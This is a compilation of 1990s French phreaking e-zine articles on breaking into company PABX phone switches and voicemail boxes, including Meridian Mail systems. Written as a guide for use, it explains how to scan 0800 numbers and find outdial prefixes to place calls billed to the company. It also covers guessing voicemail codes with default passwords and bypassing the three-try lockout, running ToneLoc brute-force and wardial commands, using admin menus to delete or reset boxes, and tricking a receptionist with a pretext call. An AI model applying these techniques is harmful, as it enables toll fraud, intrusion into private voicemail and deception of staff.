ca marche maintenant: vous appelez le PABX. Ensuite, une fois dans le PABX, vous pouvez etre redirige entre les differents postes ou services (les 4 derniers chiffres du numeront correspondent au numero du poste, par exemple 12 12 + numero de poste, comme 0003). 12 12 00 03 c'est bon, vous avez compris, et je vous vois dire que c'est facile une fois qu'on connait les 4 premiers chiffres. C'est les memes que ceux de l'entreprise. Ex: voici le numero de l'entreprise Grolame &amp; Co, 12 12 00 05. Vous savez maintenant qu'il faut mettre 12 12 + &lt;numero de poste&gt; pour avoir le numero de la ligne directe de l'employe (attention, les PABX en numeros verts ne fonctionnent pas pareil, vous n'avez pas de ligne direct dans ce cas la).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voici la theori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our detourner les PABX a son avantage, vous avez plusieurs choi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Soit vous vous connectez par la ligne directe de l'employe, et une fo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contact telephonique etabli, vous vous trouvez exactement a la plac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 l'employe et donc vous pouvez ici tester les differentes method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posees plus loin) pour essayer de faire un outdia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Sinon, vous vous connectez directement au PABX en composant le numero du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oste ou vous voulez aller. Ex: lorsque vous etes sur la "tone" interieu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u PABX (ou le service qui vous met en contact avec un post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utomatiquement), vous composez le numero du poste ou le PABX va vo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outer. Pour etre plus clair, lors du "Booooooooooooooo", faites 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umero de poste ou vous voulez aller, comme 00 03 par exemple, et un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ois le numero compose, vous vous retrouvez a la meme position que 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mploye au poste xx xx et donc comme lui vous pouvez appeler l'exterieur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avez surement remarque le "poste fictif". Certains PABX utilisent unposte dit fictif pour appeler l'exterieu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ila pour la theori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 Ca se deroule comme ca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 Trouver un PA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 Comprendre de quelle famille est le PA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3. Trouver la facon de faire un Outdia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4. Abuser du PA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5. Les conneries que l'on dit sur les PA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6. Disc-lamer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1: Partons a la quete du PA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our ceux qui aurait lu mon article sur les VMB, ils reconnaitront des extraits de cet article. Oui, c'etait parfait, et je vois pas pourquoi je l'ecrirai de nouveau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1.1 Trouver un numero (scanner les PABX a partir de 9h) Pour trouver un numero vert qui est susceptible d'avoir un PABX sans scanner pendant des jours, il faut faire les numero avec metho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Faites des numeros du genres 0800 XAB XA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 0800 140 140 ou 0800 120 12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Il y'a les numero du genre 0800 AB XC X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 0800 50 20 2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incrementerez les numero XC de +1, ex: 0800 50 20 20, 0800 50 21 21)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Puis vous avez les numero du genre 0800 41 42 43 ou 0800 43 42 41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qui s'incremente ou se decrement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Puis ceux du genre 0800 XA XC X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 0800 30 31 35 ou 0800 40 47 45 et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ref, tous les numeros qui sont faciles a memoriser ! OK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gt; Pour ceux qui n'ont pas le courage de faire ca a la main, et bien vous feriez mieux de faire autre chose ;) Fermons la la parenthes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ca *sonne* ! Mais maintenant, je fais quoi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u te tais et tu ecout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Si c'est une femme, c'est pas b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Si c'est un repondeur, OK, ca peut etre un PA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C'est une messagerie vocale. Bon, on va voir, il y a peut-etre un PA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Ca vous demande un code confidentiel ? C'est un PABX !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Ca dit rien... Strange ! Mais on garde, ca peut etre un PA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ensuite, vous trouverez par vous-meme si c'est des PABX ou pa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k, maintenant qu'on a un numero susceptible d'etre un PABX on fait quoi ? (tu passes a l'etape suivant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2 La famille du PA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aintenant que tu as un numero, essaye la touche `0'. Si ca fait "booooooo", c'est bon, c'est un PABX. Si ca marche pas avec la touche `0', essaye avec `#', `*', `9' ou `1'. Quand tu tombes sur la tone "booooooo", c'est bon. Si rien marche, essaye la sequence de touches `0*'. Si ca marche, c'est que c'estun PABX Meridian. Si ca demande un code confidentiel, tapes rien et lis ce qui va suivr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3 Faire un Outdia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emple de PABX qui fait "booooooooo": 0800 397 397. Bon, il faut maintenant se connecter sur un poste (vous savez tous bien sur comment trouver un numero de poste !). Maintenant que tu as le "booooooo" qui te tape sur le systeme, compose le numero de poste ou tu veux aller, et tu tomberas sur le greeting de l'employe, qui t'invite a laisser un message. Mais toi, tu vas pas laisser un message, tu fais donc le `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 Tu vas retomber sur le "Booooooooooo" (c'est la tone interieure du PABX). Bon maintenant, essaye de faire le `0' puis fais le numero que tu veux faire (fais le 14 par exemple comme ca tu verras ou se trouve le PABX). Si ca marche pas, essaie toutes les methodes suivant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00 + ton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1 + ton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11 + ton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9 + ton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99 + ton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Si ca marche toujours pas, essaye de 1 a 9.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 # 5 + numero (des fois, il faut doubler l'indicatif. La, dans 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emple, c'est le 5 l'indicatif).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Bon, si ca marche toujours pas, essaye de le faire sans le `*' devan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Recommence en 1 mais avec le # avant l'indicatif.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 # + 0 +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Sinon, autre technique: faites le numero du standard +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Ca marche toujours pas ? Essaye de faire un numero de poste puis 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ndicatif, puis ton numero (numero de poste = numero de VMB, donc c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erait pas mal de lire mon autre article sur les VMB, ou tout autre qu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expliquera comment avoir une VMB). Bien sur, vous pouvez essay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u pif, et surtout les numeros commencant par 4.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 (4410 + 1 + XX XX XX XX XX), ou 4410 = numero de post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Argh ! Ca marche encore pas ? Essaye de le faire en changeant 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ndicatif 1 ou 9 ou 0. Double pour voir si ca marche pas (sur certain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ABX, il faut faire # + numero de poste + indicatif +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la si rien ne se passe, c'est qu'il faut composer un numero de post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pecia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Pour faire les outdia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e fois sur la tone "booooo", vous pouvez appeler un poste de la boite en composant son numero). La, une seule facon de le trouver, c'est de faire les numeros un par un, en sachant que quand ca vous raccroche, c'est que le dernier numero que vous avez compose n'est pas b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 '4' c'est bon la, ca a pas raccroche ou sonne au standard. Puis je fais le `9'. La, ca sonne ou ca raccroche, c'est que le 9 n'etait pas le bon chiffre. Donc, rappelez, faites le `4' car vous savez qu'il est valide, recommencez avec un autre chiffre que le `9' car vous savez qu'il est pas bon. Bon, si vous avez scanne tous les numeros et que vous avez rien trouve, c'estpas la peine, ca doit etre un PABX ou on ne peut pas faire d'outdial. :( (attention, certains PABX vous permettent de faire un outdial en composant votre votre indicatif + numero dans une boite vocale. Certains se font mem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arrement lorsque vous laissez un message, donc vous devez laisser un message apres le BiiiiiP. Faites votre indicatif + numero (des fois, faites le '#' devant l'indicatif)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as des PBX Meridia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 je laisse parler Easy-Hacker de N0WaY (il aime les Meridian). J'ai rajoute des precisions. Un numero de Meridian: 0800 153 153.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gt; NT Meridian Mail &l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0n les reconnait tres aisement a la voix de la nana qui prononce les messages enregistres et aux messages qui, en dehors du message d'accueil, sont toujours les memes. N'etant pas une solution sur PC et etant cense etre pret a l'utilisation en quelques dizaines de minutes, les VMB meridian offrent toutes les memes commandes et l'arborescence differe tres peu de l'une a l'aut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rbo classique est la suivante: lorsque vous appellez, vous etes confrontes a un repondeur des plus classiques, vous laissez votre message et vous vous cassez. Si vous etes un peu curieux, vous tripotez les touches *,0 et # jusqu'a tomber sur le message jouissif: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avez obtenu un service automatise qui vous mettra en relation avec le numero compose. Veuillez entrer le nom ou le numero de la personne desiree suivit de la touch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n France, et pour rester compatible avec ce que nous avons evoqu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lus haut (ligne directe=(z)abpq+numero de poste), les numeros de postes (qui sont aussi les numeros des bals sur la VMB) sont sur 4 chiffres. En regle generale, entre 0 et 9 se trouvent des trucs particuliers comme le standard, le fax ou l'acces aux reseaux internes. Le 0 est toujours le standard, ou plus exactement le numero d'aide (car il est possible de le changer comme nous le verrons plus tard). Donc bref quand on a ce message, il suffit de composer le numero du poste puis # et hoplaboum ca dit allo dans l'post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 vous preferez une version americaine du "allo", trois cas possibl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ATTENTION: vous devez etre poste sur un vrai numero de post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Si vous le faites directos, vous ne pourrez pas dans la plupart des ca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faire des outdial (lisez mon article sur les VMB pour plus d'info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 Il suffit de faire un indicatif sur un chiffre pour avoir l'exterieur. Cet indicatif est souvent 0,1 ou 9. Suit alors le numero de telephone puis la touche #. Si vous avez le message "Il est impossible d'obtenir ce numero a partir de ce service" c'est pas le bon indicatif, ma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a ne signifie pas pour autant que le PBX est grille. Attention, certaines lignes peuvent etre en acces restreint (interdiction du 19 et du 36). Tiens j'en profite pour ajouter une petite precision importante. Il est possible d'appeller quelqu'un a partir de son nom en faisant 11 puis son nom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nverti en chiffres (ca se trouve encore sur les telephones ca ?), puis le #. Kwel sauf que si l'indicatif d'outdial est le 1, lorsque vous voulez appeller la province ou l'etranger, ca donne 119 ou 116 et cet abruti de PBX croit que vous voulez appeller quelqu'un par son nom. Les PBX qui choisissent mal leur indicatif sont donc assez limitees, mais ca depanne pour Transpa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 L'acces a l'exterieur n'est possible qu'en appellant une ligne de transit, representee par un numero de poste classique. En clair, il faut alors composer un numero de poste sur 4 chiffres, #, et si on tombe sur une tonalite, on peut enfin tester indicatif d'outdial+numero (plus besoin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aire #, tout ce que vous composez est envoye en direct sur la ligne de transit). Ces lignes de transit sont souvent utilisees pour la telesurveillance informatique (n'esperez pas en trouver le numero sur le 11).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vous trouverez d'autre methode sur mon article sur les VM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pabx avec un acces par co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 0800 00 2002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 autre cas se sont les pabx a code confidentielle souvent je dis souven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2 premiers chiffre sont les meme ex: 44 xx ou 55 x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4. ABUSONS DU P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 votre serviteur vous laisse fair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achez toutefois qu'il vaut mieux l'utiliser la nuit. Si vous n'avez pa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rouve de PABX, sachez que les PABX en numero vert plus durs a hacker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nfin, ne phonez pas pendant 12 heures a votre cousine en Islande. N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eulement, c'est trop gros et sachez que si vous mettez 120 000F de bill a la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ite, ca risque de vous attirer des problem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5. LES CONNERIES QUE L'ON A DIT SUR LES PA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Oui, les PABX savent notre numero de telephon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n les PABX n'affichent pas votre numero de telephone sauf si vous avez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 ligne Numeris (on peut demander a avoir l'anonyma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Les PABX, c'est hyper trac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rretons le massacre il y'a pas un tracer sur chaque PABX. Ici, chez F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phreaking ils sont pas trop atteints, c'est pas comme chez Sprint ou MC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Les PABX ca marche pa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Ha ha! Il est vrai que les PABX sur numero vert sont dur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Oui, mais moi je veux un PABX maintenant, la, en 38 secondes max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ais le 36 15 La Rebout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Oui mais moi, je fais du warez et je veux rien savoi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oi je joue a Quake sur 486, je phreak avec mes doigts et je lance m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asseurs de password sur des gros Cray ! Hacking roue-laisse (ca fait bie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 dire rulez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Stop le delire CoD4, je te crois est je m'en vais retourner au warez.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rg!!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6. DISC-LAM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7HS (the 7th hacker's society)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 ton nom y figure pas, il y'a bien une raison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alut a Morgan pour son aide tres precieus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pecial dedicace (l'autres est zi-va) a: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LARSEN HVU vaincra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Tous les membres du T7HS est tous ceux de #HACKF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 a LOGINZ, ^mars, scud, pegase, kikoo (qui m'a dit d'aller a la FA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uyshla| et a tous les membres de PhE! (#PH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 le MEGA BIG UP pour France Telefarc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 hop!, un peu de pub pour mon channel: #warez-FF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llez voir sur #warez-france pour me trouver, ou sur #hackf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ala, c'est tout. By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D4 phreaking ROUX-LAIZ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 tu est phreaker pro, contacte-moi, j'ai encore a apprend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 quelqu'un a des rajouts a faire, ou des critiques, des idees, ce serai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qu'il me donne son av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 votre pere travaille chez F.T ou vous meme et que vous avez des info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u des des docs, contactez-moi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 vous installez des PABX, que vous dormez avec le standard et non pas ave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 standardiste, re-contact m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gt; Recherche un pro du cellulaire et un pro de la box. Merc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_*\_/*|/**|*\/***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H/P ROULE-AS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D4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4 COD4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Te: j'ai corrige les fautes d'orthographe, la mise en page et tout, et j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eux vous dire qu'y avait du boulot ;). Si vous voulez contacter CoD4, vo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ouvez toujours laisser un mail sur la boite du groupe, je transmettra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he@mygale.org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HoTCoDe, Ph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l a raison [CoD4]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_______ __ __ ______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_ \| |_| | _____| H/P French Group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_) | _ | ____| http://www.mygale.org/02/ph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___/|__| |__|______| phe@mygale.org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___|THe PHiLaMeNT eMPi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Route #1 ¦ Hacking de VMB ¦ 4761 ¦ CoD4 ¦ NoRoute #1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HACKING DE VM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ethodes reconnues et fiables pouvan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re realisÚes par n'importe que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humain qui a un cerveau.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FINITI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e VMB c'est une boite vocale ou on peut vous laisser des messages vo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ouvez les ecouter c komme un repondeur mais si votre boite vocale es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ccessible par un numero vert n'importe ki peut vous appeler sans payer es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pouvez ecouter vos messages sans payer voila..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1. FUCK TELECOM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vant de parler de comment trouver une vmb il faut savoir a koi þa ressemb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Je classe les vmb en 3 sortes les types '1,2' les types '1,#' puis les meridia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jusque la ca veut rien dire he bien regardez les types '1,2' veut di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que une fois o menu de la VMB j'ai le choix entre la touche '1' pour envoy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 message et '2' pour aller dans ma boite aux lettres (voici un numero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ype '1,2' le 0800 00 10 1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our les types '1,#' c'est le choix entre la touche '1' pour envoyer u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essage et '#' pour aller dans la boite aux lettres. (voici un numero de typ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 0800 43 47 45).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uis pour les VMB meridian pour les reconnaitre il faut faire '81' quand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nnonce passe pour aller au menu de la vmb (certaines messageries meridia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isent carrement "bienvenue dans la messagerie meridian") (voici un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 vmb meridian le 0800 153 153).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ila on a presque tous les types de VMB que j'ai rencontre (certaines vm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ont differentes mais elles se ressemblent presque tout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2 LET'S ROCK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passons aux choses dites serieuses: le hack d'une VMB se compose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ette manie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 trouver un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 voir si c une voie enregistree qui decroche (c bon) ou si c une gentil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jeune fille qui nous "allo" (c poa b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3: tester si ce numero a une VMB ou un P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4: si oui decouvrir la procedure pour acceder a la vm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5: decouvrir le type de VMB ('1,2' ou '1,#' ou meridia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6: HACKER la VM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7: ABUSER de la VMB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llez on y va..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2.1 TROUVER UN NUMERO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our trouver un numero vert qui est susceptible d'avoir une VMB sans scann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endant des jours pour 3 ou 4 vmb il faut faire les numero avec methode pa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emple faites des numeros du genre 0800 XAB XAB ex: 0800 140 140 ou 0800 12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20 il y'a les numero du genre 0800 AB XC XC ex: 0800 50 20 20 (vo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ncrementerez les numero XC de +1 ex: 0800 50 20 20 ,0800 50 21 21) puis vo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vez les numero du genre 0800 41 42 43 ou 0800 43 42 41 (qui s'incremente ou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e decremente) puis ceux du genre 0800 XA XC XB ex: 0800 30 31 35 ou 0800 4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47 45 etc.... bref tous les numero qui sont faciles a memoriser OK (pou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eux qui on poa le courage de faire þa a la main est bien ils feraient mieux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aire autre chose ;)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2.2 TEST DU NUMERO (VMB OR NOT VMB)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ous d'abord le test du numero doit se faire la nuit (souvent les PBX qu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ONT souvent associes avec des vmb ne marchent que la nuit ). Bon votre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que vous avez fait sonne si þa dit "allo" c poa bon si þa dit "bienvenu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ans messagerie vocale machin " il y'a pas plus clair si þa dit "vous et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ien chez machin notre service n'est poa ouvert" ou tous autres messages de c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genre IL PEUT Y AVOIR UNE VM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3 TESTER SI LE NUMERO EST UNE VMB OU UN PBX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pour le savoir appuyez sur les touches '#' ou '*' ou '0' ou '9' ou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1' ou '0* ' si la femme se tait et vous dit "entrez votre numero de boit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cale" ou tous se ki se rapproche c bon il y'a un VMB vous pouvez parfo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omber sur une tonalite grave qui FAIT "Boooooooooooooooo" c un pb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tention vous tous les pabx ne font poa "Boooooooooooooooo" ) aller aut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ap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2.4 DECOUVRIR LA PROCEDURE POUR ACCEDER A LA VMB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refaites le numero reappuyez sur la ou les touches qui vous ont permis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couvrir que le numero a bien une VMB EX: 0800 43 47 45 ,# une fois qu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etes arrive a la femme (ou le mec) qui vous dis les options possib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pouvez passer a l'etape suivant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2.5 DECOUVRIR LE TYPE DE VMB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coutez bien la femme qui vous dit ses options si elle dit "pour envoyer u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essages appuyer sur '1' ..... pour aller dans votre boite vocale tapez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 (VMB DE TYPE '1,2' ) ex : le 0800 00 10 10 bon si elle dit "pou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nvoyer un message appuyer sur '1' pour aller dans votre boite voca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ppuyer sur '#'" (VMB DE TYPE '1,#') ex : le 0800 43 47 45 bon pour savoi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 c un meridian c simple si vous avez accede au VMB en faisant 81 c un VM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eridian ou souvent þa vous le dit du genre "bienvenue dans le messageri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eridian" ok ex: 0800 153 153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2.6 HACKER LA VMB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out d'abord on va parler de la procedure qui est valable pour les types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MB '1,2' et '1,# ' puis on attaquera le cas meridia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GO HACK D'une VMB de type '1,2'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aites le numero de telephones puis dites a la vmb que vous voulez all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ans votre boite vocale elle va vous demander votre numero de boite voca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apez un chiffre au hasard par exemple le '1' si þa ne dit rien c que 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umero 1 est valide puis tapez un autre chiffre ex: le 3 si þa dis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ncorect" c poa le '3' essayer un autre chiffre 4 par ex si þa ne dit rien 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que c bon exemple votre numero de boite vocale est en ce moment 14x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x=chiffres a trouver continuer jusqu'a trouver une boite valide si on vo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mande poa votre code confidentielle c bon vous avez une VMB (non n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artez pas de suite dans ce genre de VMB tres peu ont un numero de co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generalement se sont les phreakers qui en ont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GO HACK D'UNE VMB DE type '1,#'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ffectuer la meme procedure que pour les VMB DE TYPE '1,2' pour trouver u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umero de boite vocale et une fois que vous avez decouvert un numero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ite vocale valide on va vous demander votre numero de code dans 99% d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as le numero de code est le numero de la boite exemple : 44 55 code 44 55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non essayez des numeros du type numero de la boite a l'envers des numero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 code du genre 1111 ou 1234 bref vous voyez le truc (sinon faites un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ure rapide de malice ou allez voir France-Telecom pour voir si ils ont du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ulot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L'Astuce du siecl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Quand vous essayez de hacker une VMB vous etes generalement VIRES AU BOUT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3 MAUVAIS ESSAIS pour eviter de se faire virer ,au bout du 2eme essa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ppuyer sur # (ou * sur certaine vmb) pour revenir au menu principal pu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puyez sur la touche # (pour les VMB de type '1.#' est '2' pour les VMB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ype '1.2') puis recommencez le hack ou vous l'avez laiss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GO HACK D'UNE VMB MERIDIA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BRONX je vous le d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je laisse EASY HACKER parler pour mo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ette article est tire de NOWAY 2)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V) -=)&gt; La VMB meridian &l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Acces direct a la VMB (par le numero du standard)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commandes sont soit sur une digit pour selectionner quelque chose dans le menu en cours, soit sur 2 pour acceder directement a une commande quelconqu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endant le message d'accueil, il suffit de taper 81 pour acceder a un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AL. Au risque de me repeter, les bals sont sur 4 digits. Par defaut, le co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st bien entendu le numero des BALs. Le plus dur au debut est de tomber su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 numero de BAL existante. Scannez d'abord les bals de la forme x100, pu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ugmentez de 5 en 5 (x105 x110 x115 et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e fois que vous etes logg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arrivez a la lecture du courrier. Les commandes possibles son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 lecture du message en cour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4: message preceden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5: ecrire un messag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6: messave suivan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9: appelle le poste de l'expediteu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autres commandes possibles son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70: ajout de la mention "URGENT" sur un messag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71: repond au message en cour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72: consulter l'envellope du messag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73: transfer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74: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76: efface le messag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77: supprime le message de tous les destinatair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78: envoi de message dans toutes les bal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79: envoi un message apres son enregistremen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 les commandes se rapportant plus a votre boite qu'aux messag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0: parametrage VM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1: reconnexi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2: repondeurs (interne et extern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3: deconnexi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4: change le mot de pass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5: listes de diffusi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6: acces direct a un message (faire numero du msg +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7: annuaire des bal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8: maintenance des bal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9: changement du nom du propri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ertaines commandes etant particulierement interessantes, je vais e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tailler quelques un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0: permet d'acceder a un menu tres interessant concernant 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arametrage global de la VMB. Les differents choix proposes son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 change le numero de l'operateur (lorsqu'on demande de l'aide en tapan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0 ou qu'on se fait jeter apres 3 essais de hack d'une bal). Les digit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iltrees sont les memes que lorsqu'on est directos sur le PBX, par consequen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indicatifs qui ne marchaient pas n'ont pas plus de chances de marcher e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assant par la. Par contre lorsque la fonction d'appel automatique d'un post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st absente, celle-ci vient a la rescousse. Le numero doit la aussi et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uivi de # et precede de l'indicatif d'outdial. REMETTEZ IMPERATIVEMENT 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UMER0 DE P0STE PRECEDENT (ca le dit lorsque vous essayez de le modifi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nan le lendemain matin c'est D0WN !!!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 modification du message d'accueil (5 pour enregistrer, # pour fini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3: modification de l'arborescence. J'avoue ne pas avoir capte grand chos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 cette fonction (qui m'a pourtant l'air tres interessante), car elle fai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eferences a plein de nombres dont la signification est difficile a trouv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ans la doc. Mais j'ai beau avoir pratiquement tout explore, je n'ai pa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rouve quoi que ce soit permettant de modifier les indicatifs filtre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1: cette fonction est un bonheur pour pouvoir scanner d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des sans se faire deco. 0n est en effet deco au bout de 3 essais, mais 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mpteur est remis a zero lorsqu'on se logge. Par consequent, il suffit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aire deux essais, de se logger sous une bal dont on connait le code,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efaire 81 et hop... le compteur est remis a zero et on peut refaire 2 essa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vant de se relogger etc... 0n peut ainsi scanner autant de BAL que desi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ans jamais se faire deconnecter.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3: a quoi sert cette fonction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5: les listes de diffusions sont tres pratiques pour pouvoi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canner les numeros de bals utilises. Il suffit en effet d'entrer le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 la liste a creer suivi de #, de faire 5 et hop, la VMB attend les numero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 BALs et vous dit au fur et a mesure si c'est attribue ou non. Attenti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outefois: les frequences DTMF ne sont pas pris en compte lorsque le messag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it "Il n'y a pas de boite au numero". La signalisation ne reprend qu'apr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ette phrase, avant de prononcer le numero de la BAL en question. Donc n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precipitez pas sinon ca va systematiquement vous dire que la BAL entre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existe pas a cause d'une erreur de frapp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plus simple pour hacker des BALs est donc de scanner toutes l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ALs existantes grace a cette fonction, de tout noter au fur et a mesu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uis de tester celles dont le passe est egal au poste grace a la commande 81.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7: cette fonction est parfois accessible de tous, ma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generalement reservee a quelques BALs de niveau de securite superieur. C'es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ssez lourd car ca vous donne pour chaque numero le nom du proprietaire, la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ate de la derniere visite, le nombre de messages envoyes, recus, archives e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autres conneries, mais c'est quand meme une aubaine lorsque cette option es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isponibl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8: cette fonction n'est accessible que par la BAL du servic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nformatique (souvent situe dans les 9000 et ne correspondant pas forcement a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 poste en service). Les choix proposes sont les suivant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 Informations sur une boite: derniere visite, nom du proprio, et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 Suppression d'une boite: attention: le numero doit etre valide par deu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ppuis successifs sur la touch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3: Reinitialisation d'une boite: cette commande peut s'effectuer sur un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AL en service ou non. Les messages et repondeurs sont effaces, et le code es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emis au numero de la BA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l n'est malheureusement impossible de modifier le niveau d'une aut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AL ni le filtre des indicatifs a ce point-c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89: commande souvent retiree pour des raisons que je n'expliqu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as enco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2.7 ABUSER DE LA VMB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en la je vous fais confianc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3.0 PRECAUTION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en voila une vmb c bien mais il faut faire attention de pas la grill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etemen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 Ne jamais prendre une vmb deja utilisee a moins que vous n'en vouliez un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urgenc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 Ne jamais foutre le bronx sur les VMB a moins de vengeance iminente pensez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ux autr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3. Ne jamais virer les messages des autres utilisateur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4. Ne surchagez poa votre boite vocale avec une annonce de 30 minutes et 800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essag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5. Amusez vous bien est soyez toujours des mecs coo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6. Ne denoncez jamais un autre phreak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7. Vous risquez poa de vous faire tracer si vous avez poa une ligne numer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ref les VMB c bien c facille c cool c pratiqu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ais LES PABX C MIEUX alors au prochain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D4 (une precision COD4 ne veut pas dire le quatrieme COD þa veut COD4 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OUT bon je m'en vai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EW NEW NEW NEw++++++++++++++++++++++++++++++++++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 Comment se trouver facilement un BOITE VOCALE sur les VMB meridian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avez le choix bien sur de scanner tous les numero de 5 en 5 mais b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hum hum c long voici la meilleure façon heh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1 d'abords trouvez des boite meme utiliser pour cela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ors du debut du messages faites le 0* la vous allez tombez sur un messag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qui tient a peu pres ce language "vous etes en relation avec un service qu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mettra en relation avec la personne ou le poste que vous desirez consult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ntrez le numero de poste de la perssone que vous desirez consulter suiv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u #(diese)". Hum bon pour chercher un poste occupe tapez des numero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u genre 2100, 2300, 2400, etc vous voyez le genre bon une fois que vo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vez trouve une boite vocale notez la position ou elle se trou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savez maitenant que il y'a un groupe de boites vocales autours d'el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aintenant determiner le debut et la fin du groupe occup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x: il y'a des boite vocales (de 2500 a 2550) vous avez donc un groupe de 5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ites vocales enviro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llez voici le truc si la derniere VMB est 2550 ajoutez 5 est vous obtiendrez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 VMB 2555 (logique non) bon maitenant racrochez rappellez lors du messag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aites 81 la tapez le numero de boite 2555 puis comme passe 2555 (attention ça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eut changer essayer le 0000 et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Hehe et vous voila avec un jolie boite voca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 vous avez gagne du temp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OUTDIALS FACILES sur meridian (hehe meridian a mal) pour caller grato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puis UN MERIDIAN voici les 2 methodes que j'utilise d'abors loggez vous su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tre VMB OK une fois desus faite 0* la vous allez tomber sur le classiqu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etes en relation avec blablabla...." bon essayez votre numero comm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ça indicatif+numero+# a la fin EX: 00+numero+# (essayez tous l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ndicatifs bateau)ou si vous etes un vrai acharne faites tous le numero de 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 99 bon ça marche poa arg passez a la methode 2 bon d'abord faut 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umero du standard oui je veux bien mais je le trouve comment ? la fau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user allez regardez comment j'ai recupere un bo numero de standard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allo oui bonjour je voudrais connaitre votre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comment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oui en faite j'ai mis votre numero dans la memoire de mon telephone es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mme je voudrais le noter sur papier j'en aurais besoi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ha oui je comprends ben c le XXX+XXX+XXX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un fois le numero entre les pognes prenez les 4 derniers chiffres du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umero qu'elle vous as donne EX. 12 34 '55 66' prenez le 55 66 en fait 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55 66 corespond au numero de poste du standard allez reconnectez vous su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tre VMB faites 0* puis le 5566+numero+# voila c tout mais c deja poa ma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pour toute info je suis preneur ALLEZ BON HACK/PHREAK.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REDIT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7HS,PAceMAKer,BYpass,SORcErY,cleb,MayW33d,KWel,^mars ,loginz,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organ,scud ,zeb,pegase,ZZZ , est tous ceux du #hackf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 larsen qui ma donne l'idÚ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way qui ma ouvert les yeu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pc qui me les ouvre enco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sk qui est vraiment actif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uis le ph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UIS LE PLUS NOBLE DE TO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HE 7th HACKER'S SOCIETY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rticle suivant est tiré de NoRoute #2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ABX BACK AGAIN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y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D4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WARNING: VOUS DEVEZ AVOIR AU MOINS LU LE FILE SUR LES PABX (cod4pabx.tx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QUI EST DANS NOROUTE #1.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Hello! Nous revoila plus forts que jamais ! Ca y est vous avez deja touch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ux PABX et vous avez un peu mieux compris comment ca marche. Vous avez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urement une bonne centaine de VMB, et a la limite vous avez deja reussi a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aire un outdial ! Mais voila vous etes un peu sur votre faim .... vous vo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ssez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Hey! Avez-vous vraiment tous explore le PABX ? Non ? Vous avez alors loup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as mal de trucs ! Bon vous allez ratrapper tout ca.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1: SCAN du PABX !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canner un PABX ? Voui, le scan du PABX va surement vous faire decouvri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s trucs assez sympas comme: ligne de telegestion, FAX, modem, outdia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c... Bon,, je vais vous montrer comment on scanne un PABX depu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interieur. D'abord, vous devez connaitre au moins un numero de poste. Pou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voir un avoir un numero faites un tour par la VMB. Une fois que vous avez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rouve un numero de VMB (4150 par exemple), quittez la VMB. Mettez-vous su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 tone du PABX puis composez les numeros de poste de 4100 a 4199. Notez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ien les numeros qui repondent et ceux qui ne repondent pas. La, si vo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ombez sur un carrier de NITEL, bingo! vous avez trouve la ligne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elegestion (voir plus loin). Vous trouverez surement des fax, des modem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s postes simples, puis peut-etre un poste va vous demander un numero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de :) BINGO la ligne d'outdia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2: COMMENT CASSER LE CODE D'OUTDIAL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lusieurs method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1: La force brute avec un wardial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 Les mots de passe par defau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3: Le Social Enginirimachin :) ou la, comment baiser le mec quoi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1 * La force brute avec un wardial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avec les wardialers actuels vous ne devez esperer qu'une fois qu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avez compose le code ou vous tombez sur une tone sinon le wardial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era inefficace. Imaginons que vous vous voulez essayer, voici la ligne d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mmande a utiliser avec ToneLo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TONELOC&gt; toneloc xxx.dat /M0800123456,,,,,,,,,0,4147,XXX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la on compose le 0800 123 456 on attend a peu pres 15 secondes histoi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que le PABX decroche, puis on compose le 0 pour avoir la tone, pu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mposition du numero de poste, puis ToneLoc va essayer un chiffre ent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0000 et 9999. Un conseil: faites gaffe au timeout et scannez bien pour d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one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S: ne venez poa me demander comment on fait marcher Toneloc, j'en ai mar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 re-expliquer comment ca marche ! Alors tu lis la doc ou NPC-001, non ma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PS: un wardialer va sortir bientot (meme peut etre qu'il sera deja sorti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u moment ou je vous parle) qui va resoudre le probleme des PABX qui ont un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igne d'outdial ou il y'a pas de tone apres avoir compose le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2 * Les mots de passe par defau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n ne va pas repeter ce qui a deja ete dit... Ce sont les memes partou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0000, 1111, etc... puis les mots de passe bidons comme 1234, 9876...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est-a-dire qu'il faut composer tous les numeros de postes pour le trouver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Huhu, non :). Si vous composez le numero de poste 3XXX et que des que vou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vez a peine compose 3 ca a raccroche, ben c'est que deja il est pas dan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3XXX. La methode est un peu la meme que celle decrite dans les autr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rticle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mment savoir si c'est le poste d'oudial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acile! Si apres avoir compose le numero de poste il ne se passe rien e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que si vous composez encore genre 10 numeros et que ca sonne soit chez un me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al reveille ou que vous tombez sur la voix de FT qui vous dit que le numero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st poa atribue, ben vous avez gagne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mment le trouver avec ToneLoc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k, j'ai compris, vous etes un feignant, et vous voulez pas le faire a la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ain ! Il faut deja savoir dans quelle plage le poste d'outdial peut s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rouver (4XXX, 5XXX, 8XXX)... C'est le strict minimum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nsuite, il vous faut un numero ou vous etes sur qu'un modem va repond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0800 44 55 66 par exempl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n'avez plus qu'a lancer ToneLoc en mode de detection de carri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TONELOC&gt; toneloc xxx.dat /M0800112233,,,,,,,0,4XXX,0800445566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vous avez tous compris je suppos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TENTION! Cette methode n'est pas du tout conseillee car vous pouvez et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ur que le gars du PABX va s'en apercevoir! 1000 appels en une soire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a fait gro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DiVERS ]$=-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 un jour vous vous promenez dans une entreprise, il est interessant de programmer un poste pour qu'il transfere les appels (vers une BBS tr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ointaine par ex :) Mais bon, dans le cas ou on a acces a un poste, il y a tellement de truc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oi, par exemple quand j'en ai marre de scanner a la main un PABX, je lance ToneLoc en mode speaker ON est hop!, il le fait tres bien a ma plac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TONELOC&gt; toneloc xxx.dat /M0800998877,,,,,,,0,41XX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our tous ceux qui abusent de ToneLoc comme moi, voila une liste de commandesa faire pour virer les "numeros brul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EFERENCE CHAINE(s) AT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ceex 1414 AT%T1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CA-144 ultra ATX2 ou AT*F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reatix 144 AT*F ou AT%TC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reatix LC VFast AT%TC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lsa Mircolink 28800TL ATS31=128*W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scom Data Hawk AT&amp;A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Hayes Optima 28.8 AT%F0&amp;W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ultitech AT$V4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vafax 14400 et 28800 AT%TC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Olitec V32Bis et V34 ATX4 (anciens model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X2 (nouveaux model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earl 1414TVH AT&amp;F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elelink IMS-08 Faxline V.32terbo AT%U75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elejet-2400 Fax SR : AT*NC99 puis ATZ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KR Terboline AT*R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S Robotics 14400 ATS34=192 ; ATS39=1 ; ATS40=1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S Robotics 14400 Sportster ATS40=7 ; ATS40=7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S Robotics Courier DS 14.4 ATS34=192 ATS39=1 ATS40=1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S Robotics DS 16.8 en V.32terbo (brulage off) ATS40=2&amp;W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utres US Robotics ATS40=2=2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SR WoldPort AT%TCP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tel AT+N8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PV DeltaFax AT&amp;A0=2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Yoriko 14.4 ATS70=64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odems a chip 